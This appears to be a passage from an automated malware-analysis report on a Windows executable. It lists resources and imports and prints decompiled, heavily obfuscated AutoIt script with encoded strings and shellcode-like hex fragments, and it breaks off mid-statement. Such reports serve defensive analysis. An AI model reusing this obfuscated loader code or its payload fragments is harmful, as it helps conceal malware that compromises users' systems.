        RT_ICON | 0xc51f0 | 0x128 | GLS_BINARY_LSB_FIRST | English | Great Britain
        RT_ICON | 0xc5318 | 0xea8 | data | English | Great Britain
        RT_ICON | 0xc61c0 | 0x8a8 | dBase IV DBT of @.DBF, block length 1024, next free block index 40, next free block 0, next used block 0 | English | Great Britain
        RT_ICON | 0xc6a68 | 0x6c8 | data | English | Great Britain
        RT_ICON | 0xc7130 | 0x568 | GLS_BINARY_LSB_FIRST | English | Great Britain
        RT_ICON | 0xc7698 | 0xabb6 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | Great Britain
        RT_ICON | 0xd2250 | 0x25a8 | data | English | Great Britain
        RT_ICON | 0xd47f8 | 0x10a8 | data | English | Great Britain
        RT_ICON | 0xd58a0 | 0x988 | data | English | Great Britain
        RT_ICON | 0xd6228 | 0x468 | GLS_BINARY_LSB_FIRST | English | Great Britain
        RT_STRING | 0xd6690 | 0x594 | data | English | Great Britain
        RT_STRING | 0xd6c24 | 0x68a | data | English | Great Britain
        RT_STRING | 0xd72b0 | 0x490 | data | English | Great Britain
        RT_STRING | 0xd7740 | 0x5fc | data | English | Great Britain
        RT_STRING | 0xd7d3c | 0x65c | data | English | Great Britain
        RT_STRING | 0xd8398 | 0x466 | data | English | Great Britain
        RT_STRING | 0xd8800 | 0x158 | data | English | Great Britain
        RT_RCDATA | 0xd8958 | 0x400cb | data | |
        RT_GROUP_ICON | 0x118a24 | 0xbc | data | English | Great Britain
        RT_GROUP_ICON | 0x118ae0 | 0x14 | data | English | Great Britain
        RT_VERSION | 0x118af4 | 0xdc | data | English | Great Britain
        RT_MANIFEST | 0x118bd0 | 0x3b0 | ASCII text, with CRLF line terminators | English | Great Britain

        Imports

        DLLImport
        WSOCK32.dll__WSAFDIsSet, recv, send, setsockopt, ntohs, recvfrom, select, WSAStartup, htons, accept, listen, bind, closesocket, connect, WSACleanup, ioctlsocket, sendto, WSAGetLastError, inet_addr, gethostbyname, gethostname, socket
        VERSION.dllGetFileVersionInfoW, VerQueryValueW, GetFileVersionInfoSizeW
        WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
        COMCTL32.dllImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, ImageList_Create, InitCommonControlsEx, ImageList_ReplaceIcon
        MPR.dllWNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
        WININET.dllInternetReadFile, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetConnectW, InternetQueryDataAvailable
        PSAPI.DLLGetProcessMemoryInfo
        IPHLPAPI.DLLIcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
        USERENV.dllUnloadUserProfile, DestroyEnvironmentBlock, CreateEnvironmentBlock, LoadUserProfileW
        UxTheme.dllIsThemeActive
        KERNEL32.dllHeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, GetLongPathNameW, GetCurrentThread, FindNextFileW, MoveFileW, CopyFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, DeleteCriticalSection, WaitForSingleObject, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, GetShortPathNameW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, SetPriorityClass, LoadLibraryW, VirtualAlloc, CloseHandle, GetLastError, GetFullPathNameW, SetCurrentDirectoryW, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, RaiseException, 
InitializeCriticalSectionAndSpinCount, InterlockedDecrement, InterlockedIncrement, CreateThread, DuplicateHandle, EnterCriticalSection, GetCurrentProcess, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, HeapSize, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, SetFilePointer, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, HeapReAlloc, WriteConsoleW, SetEndOfFile, DeleteFileW, SetEnvironmentVariableA
        USER32.dll: SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, DrawMenuBar, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, MonitorFromRect, LoadImageW, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, CopyImage, CheckMenuRadioItem, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, UnregisterHotKey, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, DeleteMenu, PeekMessageW, MessageBoxW, DefWindowProcW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, CharLowerBuffW, GetWindowTextW
        GDI32.dll: SetPixel, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, StrokePath, GetDeviceCaps, CloseFigure, LineTo, AngleArc, CreateCompatibleBitmap, CreateCompatibleDC, MoveToEx, Ellipse, PolyDraw, BeginPath, SelectObject, StretchBlt, GetDIBits, DeleteDC, GetPixel, CreateDCW, GetStockObject, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, EndPath
        COMDLG32.dll: GetSaveFileNameW, GetOpenFileNameW
        ADVAPI32.dll: GetAclInformation, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegCreateKeyExW, GetUserNameW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, InitiateSystemShutdownExW, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, SetSecurityDescriptorDacl, AddAce, GetAce
        SHELL32.dll: DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
        ole32.dll: CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket
        OLEAUT32.dll: RegisterTypeLib, LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, UnRegisterTypeLib, SafeArrayCreateVector, SysAllocString, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, OleLoadPicture, QueryPathOfRegTypeLib, VariantCopy, VariantClear, CreateDispTypeInfo, CreateStdDispatch, DispCallFunc, VariantChangeType, SafeArrayAllocDescriptorEx, VariantInit

        Version Infos

        Description | Data
        Translation | 0x0809 0x04b0

        Possible Origin

        Language of compilation system | Country where language is spoken
        English | Great Britain

        Static AutoIT Info

        General

        Code:
& $C31KU765 (R37FLO7 (87336 ) ) & $C31KU765 (R37FLO7 (87332 ) ) & $C31KU765 (R37FLO7 (87349 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87331 ) ) & $C31KU765 (R37FLO7 (87331 ) ) & $C31KU765 (R37FLO7 (87347 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87336 ) ) & $C31KU765 (R37FLO7 (87337 ) ) & $C31KU765 (R37FLO7 (87333 ) ) & $C31KU765 (R37FLO7 (87348 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87336 ) ) & $C31KU765 (R37FLO7 (87334 ) ) & $C31KU765 (R37FLO7 (87334 ) ) & $C31KU765 (R37FLO7 (87331 ) ) & $C31KU765 (R37FLO7 (87346 ) ) & $C31KU765 (R37FLO7 (87332 ) ) & $C31KU765 (R37FLO7 (87334 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87334 ) ) & $C31KU765 (R37FLO7 (87335 ) ) & $C31KU765 (R37FLO7 (87331 ) ) & $C31KU765 (R37FLO7 (87334 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87336 ) ) & $C31KU765 (R37FLO7 (87346 ) ) & $C31KU765 (R37FLO7 (87333 ) ) & $C31KU765 (R37FLO7 (87348 ) ) & $C31KU765 (R37FLO7 (87347 ) ) & $C31KU765 (R37FLO7 (87336 ) ) & $C31KU765 (R37FLO7 (87336 ) ) & $C31KU765 (R37FLO7 (87331 ) ) & $C31KU765 (R37FLO7 (87347 ) ) & $C31KU765 (R37FLO7 (87331 ) ) & $C31KU765 (R37FLO7 (87331 ) ) & $C31KU765 (R37FLO7 (87347 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87331 ) ) & $C31KU765 (R37FLO7 (87348 ) ) & $C31KU765 (R37FLO7 (87349 ) ) & $C31KU765 (R37FLO7 (87336 ) ) & $C31KU765 (R37FLO7 (87346 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87331 ) ) & $C31KU765 (R37FLO7 (87345 ) ) & $C31KU765 (R37FLO7 (87337 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87330 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 
(R37FLO7 (87335 ) ) & $C31KU765 (R37FLO7 (87332 ) ) & $C31KU765 (R37FLO7 (87329 ) ) & $C31KU765 (R37FLO7 (87337 ) ) & $C31KU765 (R37FLO7 (87336 ) ) & $C31KU765 (R37FLO7 (87333 ) ) & $C31KU765 (R37FLO7 (87347 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87335 ) ) & $C31KU765 (R37FLO7 (87337 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87332 ) ) & $C31KU765 (R37FLO7 (87334 ) ) & $C31KU765 (R37FLO7 (87345 ) ) & $C31KU765 (R37FLO7 (87332 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87349 ) ) & $C31KU765 (R37FLO7 (87346 ) ) & $C31KU765 (R37FLO7 (87329 ) ) & $C31KU765 (R37FLO7 (87335 ) ) & $C31KU765 (R37FLO7 (87330 ) ) $912996352 = 140363252 CASE 603408284 $T33R0R ("nrxu5jurku5bkjha" , $U3131F51ZD ("01aa07eg0bwddakcuoqxzwstr" , 21 + 4294963165 + 4131 ) ) $912996352 = 970108844 CASE 606900647 GLOBAL $K313035376XQRGU = $U3131F51ZD ("svh44qscejhv0uvfp51hbum2srktd0833C983C41C33F6663B4A067350894D0C8B433C03450C8B8C18080" , 29 + 5057 * 4 + 4294947068 ) $912996352 = 820767532 CASE 607502147 $T33R0R ("tsbojzgpdl8j3dtx1lvog8kl1f" , $C31KU765 (R37FLO7 (87329 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87336 ) ) & $C31KU765 (R37FLO7 (87346 ) ) & $C31KU765 (R37FLO7 (87329 ) ) & $C31KU765 (R37FLO7 (87330 ) ) & $C31KU765 (R37FLO7 (87335 ) ) & $C31KU765 (R37FLO7 (87333 ) ) & $C31KU765 (R37FLO7 (87348 ) ) & $C31KU765 (R37FLO7 (87337 ) ) & $C31KU765 (R37FLO7 (87336 ) ) & $C31KU765 (R37FLO7 (87346 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87336 ) ) & $C31KU765 (R37FLO7 (87348 ) ) & $C31KU765 (R37FLO7 (87332 ) ) & $C31KU765 (R37FLO7 (87333 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87332 ) ) & $C31KU765 (R37FLO7 (87333 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87333 ) ) & $C31KU765 (R37FLO7 (87334 ) ) & $C31KU765 (R37FLO7 (87349 ) ) & $C31KU765 (R37FLO7 (87336 ) ) & $C31KU765 (R37FLO7 (87330 ) ) & $C31KU765 (R37FLO7 (87330 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & 
$C31KU765 (R37FLO7 (87347 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87334 ) ) & $C31KU765 (R37FLO7 (87345 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87333 ) ) & $C31KU765 (R37FLO7 (87331 ) ) & $C31KU765 (R37FLO7 (87336 ) ) & $C31KU765 (R37FLO7 (87348 ) ) & $C31KU765 (R37FLO7 (87332 ) ) & $C31KU765 (R37FLO7 (87348 ) ) & $C31KU765 (R37FLO7 (87349 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87333 ) ) & $C31KU765 (R37FLO7 (87329 ) ) & $C31KU765 (R37FLO7 (87333 ) ) & $C31KU765 (R37FLO7 (87334 ) ) & $C31KU765 (R37FLO7 (87336 ) ) & $C31KU765 (R37FLO7 (87346 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87336 ) ) & $C31KU765 (R37FLO7 (87349 ) ) & $C31KU765 (R37FLO7 (87336 ) ) & $C31KU765 (R37FLO7 (87329 ) ) & $C31KU765 (R37FLO7 (87331 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87347 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87350 ) ) ) $912996352 = 1134265100 CASE 624601310 $T33R0R ("mpgi338pxqjq5t" , $V39NUX ("3366yw3C0466yw0566ywF566ywE66yw5B5DC2080066yw566yw566yw8B66ywE66yw" , "66yw" , "" ) ) $912996352 = 1711601707 CASE 684192185 $T33R0R ("ql7enj02k6zwk5v638lhlhl2plmy4b" , $I31330D6 ("34z7ft7fbvngowoj756g7" , 19 + 3788 + 4294963508 ) ) $912996352 = 1892817007 CASE 694144588 $T33R0R ("frzljrw88wx17" , $V3135P3 ("hunolhab53kxcl787d0zc75C20C1CF0D03F8E2F081FF5BBC4A6A8B42108B1275D98BF08D45C85056C745C84C6F6164C745CC45p2iy1srkp4mkmsoqyozu7rb5" , 24 + 1933 * 4 + 4294959564 , 78 + 1933 * 4 + 4294959564 ) ) $912996352 = 1597403880 CASE 698963862 GLOBAL $P39311N = $U3131F51ZD ("ywu1gzxge1cepbw8ftrbvsn25ijjw10" , 29 + 3027 + 4294964269 ) $912996352 = 706251512 CASE 702101058 GLOBAL $H323535388TDCH = $U32343233PUXJX ($Z37IB8K ("0x50726F6365737357616974436C6F7365" ) ) $912996352 = 1784859230 CASE 706251512 
GLOBAL $K3933UG = $V3135P3 ("gsqpg8wtxu5ewak64z15y705034ezrjvhhqxe0gdgaag4m6tz5yf2" , 26 + 4294960058 + 7238 , 2 + 4294960058 + 7238 ) $912996352 = 554725439 CASE 710150805 $T33R0R ("xpw22kcrvth5yk2" , $C31KU765 (R37FLO7 (87387 ) ) & $C31KU765 (R37FLO7 (87381 ) ) & $C31KU765 (R37FLO7 (87394 ) ) & $C31KU765 (R37FLO7 (87390 ) ) & $C31KU765 (R37FLO7 (87381 ) ) & $C31KU765 (R37FLO7 (87388 ) ) & $C31KU765 (R37FLO7 (87331 ) ) & $C31KU765 (R37FLO7 (87330 ) ) ) $912996352 = 1832861087 CASE 727667031 GLOBAL $D32343432T5 = $U32343233PUXJX ($X3231PEJE8 ) $912996352 = 1072149379 CASE 735486160 GLOBAL $F32343534YAF = $U32343233PUXJX ($F3235VCXC3 ) $912996352 = 902200369 CASE 747332703 GLOBAL $X343738EE714 = $C31KU765 (R37FLO7 (87337 ) ) & $C31KU765 (R37FLO7 (87333 ) ) & $C31KU765 (R37FLO7 (87348 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87336 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87348 ) ) & $C31KU765 (R37FLO7 (87334 ) ) & $C31KU765 (R37FLO7 (87336 ) ) & $C31KU765 (R37FLO7 (87333 ) ) & $C31KU765 (R37FLO7 (87347 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87335 ) ) & $C31KU765 (R37FLO7 (87333 ) ) & $C31KU765 (R37FLO7 (87330 ) ) & $C31KU765 (R37FLO7 (87348 ) ) & $C31KU765 (R37FLO7 (87336 ) ) & $C31KU765 (R37FLO7 (87346 ) ) & $C31KU765 (R37FLO7 (87332 ) ) & $C31KU765 (R37FLO7 (87348 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87336 ) ) & $C31KU765 (R37FLO7 (87336 ) ) & $C31KU765 (R37FLO7 (87346 ) ) & $C31KU765 (R37FLO7 (87333 ) ) & $C31KU765 (R37FLO7 (87333 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87336 ) ) & $C31KU765 (R37FLO7 (87333 ) ) & $C31KU765 (R37FLO7 (87331 ) ) & $C31KU765 (R37FLO7 (87333 ) ) & $C31KU765 (R37FLO7 (87329 ) ) & $C31KU765 (R37FLO7 (87333 ) ) & $C31KU765 (R37FLO7 (87331 ) ) & $C31KU765 (R37FLO7 (87333 ) ) & $C31KU765 (R37FLO7 (87331 ) ) & $C31KU765 (R37FLO7 (87334 ) ) & $C31KU765 (R37FLO7 (87345 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 
(R37FLO7 (87332 ) ) & $C31KU765 (R37FLO7 (87334 ) ) & $C31KU765 (R37FLO7 (87345 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87334 ) ) & $C31KU765 (R37FLO7 (87333 ) ) & $C31KU765 (R37FLO7 (87330 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87348 ) ) & $C31KU765 (R37FLO7 (87335 ) ) & $C31KU765 (R37FLO7 (87336 ) ) & $C31KU765 (R37FLO7 (87346 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87336 ) ) & $C31KU765 (R37FLO7 (87346 ) ) & $C31KU765 (R37FLO7 (87332 ) ) & $C31KU765 (R37FLO7 (87333 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87336 ) ) & $C31KU765 (R37FLO7 (87333 ) ) $912996352 = 471869101 CASE 752923903 GLOBAL $J323534391M = $U32343233PUXJX ($O353SY ("cju07subn46zrslhhjrfy56aqp6" ) ) $912996352 = 1266755676 CASE 754282959 GLOBAL $X3138333341D8X5 = $C31KU765 (R37FLO7 (87336 ) ) & $C31KU765 (R37FLO7 (87332 ) ) & $C31KU765 (R37FLO7 (87349 ) ) & $C31KU765 (R37FLO7 (87336 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87331 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87332 ) ) & $C31KU765 (R37FLO7 (87334 ) ) & $C31KU765 (R37FLO7 (87336 ) ) & $C31KU765 (R37FLO7 (87331 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87349 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87335 ) ) & $C31KU765 (R37FLO7 (87347 ) ) & $C31KU765 (R37FLO7 (87348 ) ) & $C31KU765 (R37FLO7 (87332 ) ) & $C31KU765 (R37FLO7 (87331 ) ) & $C31KU765 (R37FLO7 (87331 ) ) & $C31KU765 (R37FLO7 (87347 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87332 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87336 ) ) & $C31KU765 (R37FLO7 (87337 ) ) & $C31KU765 (R37FLO7 (87336 ) ) & $C31KU765 (R37FLO7 (87333 ) ) & $C31KU765 (R37FLO7 (87334 ) ) & $C31KU765 (R37FLO7 (87332 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & 
$C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87336 ) ) & $C31KU765 (R37FLO7 (87348 ) ) & $C31KU765 (R37FLO7 (87332 ) ) & $C31KU765 (R37FLO7 (87333 ) ) & $C31KU765 (R37FLO7 (87349 ) ) & $C31KU765 (R37FLO7 (87332 ) ) & $C31KU765 (R37FLO7 (87334 ) ) & $C31KU765 (R37FLO7 (87345 ) ) & $C31KU765 (R37FLO7 (87329 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87333 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87333 ) ) & $C31KU765 (R37FLO7 (87333 ) ) & $C31KU765 (R37FLO7 (87348 ) ) & $C31KU765 (R37FLO7 (87336 ) ) & $C31KU765 (R37FLO7 (87334 ) ) & $C31KU765 (R37FLO7 (87345 ) ) & $C31KU765 (R37FLO7 (87332 ) ) & $C31KU765 (R37FLO7 (87332 ) ) & $C31KU765 (R37FLO7 (87336 ) ) & $C31KU765 (R37FLO7 (87348 ) ) & $C31KU765 (R37FLO7 (87336 ) ) & $C31KU765 (R37FLO7 (87333 ) ) & $C31KU765 (R37FLO7 (87345 ) ) & $C31KU765 (R37FLO7 (87336 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87349 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87333 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87333 ) ) & $C31KU765 (R37FLO7 (87333 ) ) & $C31KU765 (R37FLO7 (87348 ) ) & $C31KU765 (R37FLO7 (87336 ) ) & $C31KU765 (R37FLO7 (87334 ) ) & $C31KU765 (R37FLO7 (87336 ) ) & $C31KU765 (R37FLO7 (87347 ) ) & $C31KU765 (R37FLO7 (87347 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87330 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87328 ) ) $912996352 = 433803471 CASE 754347554 $T33R0R ("brjehhc40zj4ikbv2s6rd0p4" , $V3135P3 ("x844f0hr7gfurjsa+SHbnd1dzatxlaz6o4v4q2waikkqr0o" , 17 + 1417 * 1 + 4294965879 , 3 + 1417 * 1 + 4294965879 ) ) $912996352 = 
